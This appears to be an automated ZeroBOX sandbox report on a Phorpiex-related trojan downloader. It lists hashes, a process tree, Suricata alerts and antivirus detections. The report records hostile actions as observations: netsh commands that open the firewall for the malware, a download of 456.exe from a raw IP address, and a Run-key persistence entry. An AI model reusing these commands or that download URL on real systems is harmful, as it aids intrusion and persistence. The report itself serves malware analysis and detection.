Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 15, 2021, 12:30 p.m.	Aug. 15, 2021, 12:51 p.m.

Size	5.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`627fc88e4e32885ef3eb655f353d3d73`
SHA256	`789a247aac003f6562a3809a60d214843d77f8c0e0fa24ba479a229a4b86cf69`
CRC32	`94FC0477`
ssdeep	`96:1mCmaBINl1oulwdFf4kYyPtboynuVYCt:1GliuOdJ4kYyP1oyn0L`
PDB Path	gf6d576s4d576f87g98f6d54sd57f67g657s6d576ftgyutfdd6d6u6duyyds5yssd
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Win_Worm_Phorpiex - a worm which spreads via removable drives and network drives.

a.exe "C:\Users\test22\AppData\Local\Temp\a.exe"
1016
- hhhhhhhhhhh.exe C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe
  2888
  - winappmgr.exe "C:\Users\test22\Windows Application Manager\winappmgr.exe"
    2572
    - cmd.exe "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
      900
      - netsh.exe netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe"
        1852
      - netsh.exe netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
        2952
    - cmd.exe "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" || netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
      656
      - netsh.exe netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe"
        2208
      - netsh.exe netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
        2340
    - cmd.exe "C:\Windows\System32\cmd.exe" /c netsh firewall set service type= upnp mode = enable
      2356
      - netsh.exe netsh firewall set service type= upnp mode = enable
        2232
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
stun.jabbim.cz	A 88.86.102.51	88.86.102.51

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.215.113.22	Active	Moloch
79.141.72.138	Active	Moloch
79.141.72.156	Active	Moloch
79.141.72.52	Active	Moloch
88.86.102.51	Active	Moloch
88.86.102.52	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:61481 -> 88.86.102.51:3478	2016149	ET INFO Session Traversal Utilities for NAT (STUN Binding Request)	Attempted User Privilege Gain
TCP 185.215.113.22:80 -> 192.168.56.101:49198	2400024	ET DROP Spamhaus DROP Listed Traffic Inbound group 25	Misc Attack
UDP 192.168.56.101:61481 -> 88.86.102.52:3479	2033078	ET INFO Session Traversal Utilities for NAT (STUN Binding Request On Non-Standard High Port)	Attempted User Privilege Gain
UDP 88.86.102.52:3479 -> 192.168.56.101:61481	2018908	ET INFO Session Traversal Utilities for NAT (STUN Binding Response)	Generic Protocol Command Decode
UDP 88.86.102.51:3478 -> 192.168.56.101:61481	2016150	ET INFO Session Traversal Utilities for NAT (STUN Binding Response)	Attempted User Privilege Gain
UDP 88.86.102.51:3478 -> 192.168.56.101:61481	2018908	ET INFO Session Traversal Utilities for NAT (STUN Binding Response)	Generic Protocol Command Decode
UDP 192.168.56.101:61481 -> 88.86.102.51:3478	2016149	ET INFO Session Traversal Utilities for NAT (STUN Binding Request)	Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478	2018907	ET INFO Session Traversal Utilities for NAT (STUN Binding Request obsolete rfc 3489 CHANGE-REQUEST attribute change IP flag true change port flag true)	Generic Protocol Command Decode
UDP 192.168.56.101:61481 -> 88.86.102.51:3478	2016149	ET INFO Session Traversal Utilities for NAT (STUN Binding Request)	Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478	2016149	ET INFO Session Traversal Utilities for NAT (STUN Binding Request)	Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478	2016149	ET INFO Session Traversal Utilities for NAT (STUN Binding Request)	Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478	2018905	ET INFO Session Traversal Utilities for NAT (STUN Binding Request obsolete rfc 3489 CHANGE-REQUEST attribute change IP flag false change port flag true)	Generic Protocol Command Decode
UDP 192.168.56.101:61481 -> 88.86.102.51:3478	2016149	ET INFO Session Traversal Utilities for NAT (STUN Binding Request)	Attempted User Privilege Gain
UDP 192.168.56.101:61481 -> 88.86.102.51:3478	2016149	ET INFO Session Traversal Utilities for NAT (STUN Binding Request)	Attempted User Privilege Gain
TCP 192.168.56.101:49198 -> 185.215.113.22:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 185.215.113.22:80 -> 192.168.56.101:49198	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.22:80 -> 192.168.56.101:49198	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Command line console output was observed (6 events)

Time & API	Arguments	Status	Return
WriteConsoleA Aug. 15, 2021, 12:50 p.m.	buffer: No rules match the specified criteria. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 15, 2021, 12:50 p.m.	buffer: Ok. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 15, 2021, 12:51 p.m.	buffer: No rules match the specified criteria. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 15, 2021, 12:51 p.m.	buffer: Ok. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 15, 2021, 12:51 p.m.	buffer: IMPORTANT: Command executed successfully. However, "netsh firewall" is deprecated; use "netsh advfirewall firewall" instead. For more information on using "netsh advfirewall firewall" commands instead of "netsh firewall", see KB article 947709 at http://go.microsoft.com/fwlink/?linkid=121488 . console_handle: 0x00000007	1	1
WriteConsoleA Aug. 15, 2021, 12:51 p.m.	buffer: Ok. console_handle: 0x00000007	1	1

This executable has a PDB path (1 event)

pdb_path

gf6d576s4d576f87g98f6d54sd57f67g657s6d576ftgyutfdd6d6u6duyyds5yssd

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 15, 2021, 12:30 p.m.		1	1	0

The executable uses a known packer (1 event)

packer

Armadillo v1.71

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://185.215.113.22/456.exe

Performs some HTTP requests (1 event)

request

GET http://185.215.113.22/456.exe

Communication to multiple IPs on high port numbers possibly indicative of a peer-to-peer (P2P) or non-standard command and control protocol (5 events)

ip	79.141.72.138
ip	79.141.72.156
ip	79.141.72.52
ip	88.86.102.51
ip	88.86.102.52

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Aug. 15, 2021, 12:43 p.m.	total_number_of_free_bytes: 13651218432 free_bytes_available: 13651218432 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW Aug. 15, 2021, 12:30 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\Windows Application Manager filepath: C:\Users\test22\Windows Application Manager	1	1	0

Creates a suspicious process (6 events)

cmdline	cmd.exe /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline	cmd.exe /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline	"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline	"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c netsh firewall set service type= upnp mode = enable
cmdline	cmd.exe /c netsh firewall set service type= upnp mode = enable

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 15, 2021, 12:49 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe" filepath: cmd.exe	1	1
ShellExecuteExW Aug. 15, 2021, 12:51 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480 filepath: cmd.exe	1	1
ShellExecuteExW Aug. 15, 2021, 12:51 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c netsh firewall set service type= upnp mode = enable filepath: cmd.exe	1	1

An executable file was downloaded by the process a.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Aug. 15, 2021, 12:30 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ï'4¼FZïFZïFZïÏïFZïÙïúFZï¬7ïFZï¬!ïFZïF[ï}FZïÞï¤FZïËïFZïRichFZïPELÜÒaà ì\|ÌT@À¯@\|6´lð°*@¬.textÕêì `.rdata request_handle: 0x00cc000c	1	1	0

Uses Windows utilities for basic Windows functionality (11 events)

cmdline	netsh firewall set service type= upnp mode = enable
cmdline	cmd.exe /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline	cmd.exe /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline	netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline	"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline	netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe"
cmdline	netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline	netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c netsh firewall set service type= upnp mode = enable
cmdline	cmd.exe /c netsh firewall set service type= upnp mode = enable

Communicates with host for which no DNS query was performed (5 events)

host	185.215.113.22
host	79.141.72.138
host	79.141.72.156
host	79.141.72.52
host	88.86.102.52

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Application Manager

reg_value

C:\Users\test22\Windows Application Manager\winappmgr.exe

Operates on local firewall's policies and settings (8 events)

cmdline	cmd.exe /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline	cmd.exe /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline	netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline	"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe" \|\| netsh advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name="c:\users\test22\windows application manager\winappmgr.exe" program="C:\Users\test22\Windows Application Manager\winappmgr.exe"
cmdline	netsh advfirewall firewall show rule name="c:\users\test22\windows application manager\winappmgr.exe"
cmdline	netsh advfirewall firewall add rule name="Port 61480 c:\users\test22\windows application manager\winappmgr.exe" dir=in action=allow protocol=UDP localport=61480
cmdline	netsh advfirewall firewall show rule "Port 61480 c:\users\test22\windows application manager\winappmgr.exe"

Attempts to remove evidence of file being downloaded from the Internet (1 event)

file	C:\Users\test22\AppData\Local\Temp\hhhhhhhhhhh.exe:Zone.Identifier

File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)

Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (high confidence)
DrWeb	Trojan.DownLoader41.11535
MicroWorld-eScan	Trojan.GenericKD.37397742
FireEye	Generic.mg.627fc88e4e32885e
Qihoo-360	Win32/Trojan.Generic.HwcBQD8A
ALYac	Gen:Heur.Mint.Zard.39
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Alibaba	Trojan:Win32/XPACK.a375ca36
Cybereason	malicious.e4e328
BitDefenderTheta	Gen:NN.ZexaF.34058.auW@aGHFmWdi
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Generik.ENSYFDJ
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan.Win32.Generic
BitDefender	Trojan.GenericKD.37397742
Avast	Win32:Malware-gen
Rising	Trojan.Generic@ML.100 (RDMK:pENf5AL3BElD7ufUbstsaw)
Ad-Aware	Trojan.GenericKD.37397742
Sophos	Mal/Generic-S
McAfee-GW-Edition	BehavesLike.Win32.Generic.zt
Emsisoft	Trojan.GenericKD.37397742 (B)
SentinelOne	Static AI - Malicious PE
Webroot	W32.Malware.Gen
Avira	TR/Crypt.XPACK.Gen
MAX	malware (ai score=100)
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
Gridinsoft	Trojan.Win32.Downloader.oa
Arcabit	Trojan.Generic.D23AA4EE
GData	Trojan.GenericKD.37397742
Cynet	Malicious (score: 100)
Acronis	suspicious
McAfee	RDN/Generic.grp
VBA32	suspected of Trojan.Downloader.gen
TrendMicro-HouseCall	TROJ_GEN.R002H0CHD21
Tencent	Win32.Trojan.Generic.Wncx
Ikarus	Trojan.Crypt
Fortinet	W32/PossibleThreat
AVG	Win32:Malware-gen
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_100% (W)

a.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All